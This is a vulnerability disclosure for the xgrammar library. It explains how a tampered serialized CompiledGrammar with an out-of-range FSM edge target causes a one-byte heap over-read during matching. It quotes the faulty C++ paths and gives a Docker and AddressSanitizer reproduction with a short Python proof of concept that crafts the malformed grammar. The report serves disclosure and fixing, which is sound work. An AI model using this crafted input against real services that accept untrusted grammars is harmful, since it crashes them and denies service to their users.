Out-of-Bounds Read Through Deserialized FSM Targets
Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730
Summary
At source revision f07ca3c, a process that accepts an untrusted serialized CompiledGrammar can be crashed by an FSM edge whose target is outside that FSM's state range. The supplied PoC changes the only character edge of the two-state FSM for root ::= "a" from target 1 to target 2. Deserialization accepts the value, but GrammarMatcher.accept_string("a") later uses 2 to index a two-byte parser metadata cache. The supplied AddressSanitizer trace records a one-byte heap-buffer-overflow read in EarleyParser::GetFsmStateFlags.
This is a malformed-compiled-grammar memory-safety and availability issue; the PoC does not establish disclosure of useful adjacent data or code execution. An attacker must be able to supply or modify the serialized compiled grammar. I verified the source path and inspected the supplied PoC and AddressSanitizer trace. I did not rerun the full Python/torch container build during this review.
Detail
The root cause is a missing semantic validation step at the serialization boundary. FSMEdge::target is an int32_t, and reflection deserialization verifies that the JSON value is an integer, but it does not verify the invariant required by every FSM traversal: each target must satisfy 0 <= target < NumStates().
At the assessed revision, DeserializeJSONValue(CompactFSM*) in cpp/fsm.cc reconstructs the private implementation and immediately reports success:
std::optional<SerializationError> DeserializeJSONValue(
CompactFSM* result, const picojson::value& value, const std::string& type_name
) {
return detail::json_serializer::AutoDeserializeJSONValuePImpl(result, value, type_name);
}
NumStates() comes from the number of rows in the compact edge array, not from the largest referenced target. Consequently, changing a valid edge target does not enlarge the FSM. In the PoC, the indptr_ array still describes two states while the edge in state 0 points to nonexistent state 2. This finding is specifically about edge targets; the earlier draft's references to unchecked start states, end states, CSR offsets, and auxiliary indexes were not needed to establish this crash and are not claims made by this report.
The malformed value enters through CompiledGrammar.deserialize_json. There is a second error-handling gap in cpp/compiled_grammar.cc: the return value from nested grammar deserialization is ignored.
AutoDeserializeJSONValue(&(impl->grammar), object["grammar"], type_name);
The trust-boundary failure exists at two layers: an invalid target is accepted by CompactFSM, and a nested DeserializeFormatError is then discarded by the CompiledGrammar wrapper. Either behavior allows construction to continue with invalid state.
Matcher construction reaches valid state 0, so it initializes fsm_state_flags_cache_[rule_id] to the FSM's actual state count of two. When accept_string("a") runs, EarleyParser::AdvanceFsm in cpp/earley_parser.cc matches the modified character edge, copies edge.target into new_state.element_id, and asks for flags for the same target:
auto new_state = state;
new_state.element_id = edge.target;
const uint8_t flags = GetFsmStateFlags(state.rule_id, edge.target);
GetFsmStateFlags in cpp/earley_parser.h checks the index only with XGRAMMAR_DCHECK. In builds where internal checks and standard-library assertions are disabled, the already-sized cache is indexed directly:
auto& flags_cache = fsm_state_flags_cache_[rule_id];
if (!flags_cache.empty()) {
XGRAMMAR_DCHECK(state_id >= 0 && state_id < static_cast<int32_t>(flags_cache.size()));
if (flags_cache[state_id] != 0) {
return flags_cache[state_id];
}
}
return InitializeFsmStateFlags(rule_id, state_id);
For state_id == 2 and flags_cache.size() == 2, the first flags_cache[state_id] is exactly one byte past the allocation, matching the supplied AddressSanitizer report. A debug assertion may turn the same malformed input into an earlier abort, but it does not make untrusted deserialization safe.
The unchecked CompactFSM deserializer is present in the v0.1.23 source snapshot and remains present at the assessed revision. The exact lazy per-rule cache sink and the supplied PoC were verified only against revision f07ca3c; this review therefore does not claim that every intermediate release produces the identical stack trace.
Reproduce
Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.
The JSON path per_rule_fsms[0][0][0] selects the compact FSM object and
edges.data_[0][2] selects the first edge's target. The command shallow-clones the current default
branch, prints the resolved commit, and runs only inside a disposable container; AddressSanitizer
intentionally aborts the final Python process.
docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --depth 1
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > repro.py <<'PY'
import json
import xgrammar as xgr
tokenizer = xgr.TokenizerInfo(["a"])
compiler = xgr.GrammarCompiler(tokenizer, max_threads=1, cache_enabled=False)
obj = json.loads(compiler.compile_grammar('root ::= "a"').serialize_json())
obj["grammar"]["per_rule_fsms"][0][0][0]["edges"]["data_"][0][2] = 2
compiled = xgr.CompiledGrammar.deserialize_json(json.dumps(obj), tokenizer)
xgr.GrammarMatcher(compiled).accept_string("a")
PY
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$(g++ -print-file-name=libasan.so)" \
python repro.py
DOCKER
Credit
Zheng Yu @ Depthfirst